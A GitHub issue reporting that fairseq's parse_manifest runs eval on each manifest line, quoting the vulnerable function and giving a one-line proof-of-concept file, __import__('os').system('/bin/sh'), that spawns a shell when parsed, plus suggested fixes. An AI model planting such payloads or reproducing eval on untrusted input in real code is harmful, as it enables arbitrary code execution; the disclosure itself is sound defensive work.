Dangerous implement of parsers (`fairseq.data.codedataset.parse_manifest`) can cause RCE while parsing a well-constructed evil file. #4869

Lyutoon · 2022-11-17T00:35:43Z

🐛 Bug

Dangerous function eval is used in fairseq.data.codedataset.parse_manifest. parse_manifest is often used to parse the manifest file while doing loading (see official example https://github.com/facebookresearch/fairseq/blob/b5a039c292facba9c73f59ff34621ec131d82341/examples/textless_nlp/pgslm/prepare_dataset.py). But there is no security check about the incoming file and just apply eval to reading lines. So if an attacker constructs a evil file and feeds it to the server or give it to a people but he doesn't check the file, just load it, and then it will lead to RCE.

But if we check the if-else code:

def parse_manifest(manifest, dictionary):
    audio_files = []
    codes = []
    durations = []
    speakers = []

    with open(manifest) as info:
        for line in info.readlines():
            sample = eval(line.strip())
            if "cpc_km100" in sample:
                k = "cpc_km100"
            elif "hubert_km100" in sample:
                k = "hubert_km100"
            elif "phone" in sample:
                k = "phone"
            else:
                assert False, "unknown format"
            code = sample[k]
            code, duration = parse_code(code, dictionary, append_eos=True)

            codes.append(code)
            durations.append(duration)
            audio_files.append(sample["audio"])
            speakers.append(sample.get("speaker", None))

    return audio_files, codes, durations, speakers

We can see that the check only works for str type, so there is actually no need to use eval.

To Reproduce

Here I give a simplest example.
First construct a evil file:

echo "__import__('os').system('/bin/sh')" > evil_file

Second we just parse it.

from fairseq.data.codedataset import parse_manifest

parse_manifest('evil_file', None)

Environment

fairseq Version: 0.12.2
OS: linux
How you installed fairseq: pip
Python version: 3.8.10

Additional context

Actually it can be easily fixed just do not use eval. If we only need the code work on str type, just use str(). Or use literal_eval()

The text was updated successfully, but these errors were encountered:

Lyutoon added bug needs triage labels Nov 17, 2022

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Dangerous implement of parsers (`fairseq.data.codedataset.parse_manifest`) can cause RCE while parsing a well-constructed evil file. #4869

Dangerous implement of parsers (`fairseq.data.codedataset.parse_manifest`) can cause RCE while parsing a well-constructed evil file. #4869

Lyutoon commented Nov 17, 2022 •

edited

Dangerous implement of parsers (fairseq.data.codedataset.parse_manifest) can cause RCE while parsing a well-constructed evil file. #4869

Dangerous implement of parsers (fairseq.data.codedataset.parse_manifest) can cause RCE while parsing a well-constructed evil file. #4869

Comments

Lyutoon commented Nov 17, 2022 • edited

🐛 Bug

To Reproduce

Environment

Additional context

Dangerous implement of parsers (`fairseq.data.codedataset.parse_manifest`) can cause RCE while parsing a well-constructed evil file. #4869

Dangerous implement of parsers (`fairseq.data.codedataset.parse_manifest`) can cause RCE while parsing a well-constructed evil file. #4869

Lyutoon commented Nov 17, 2022 •

edited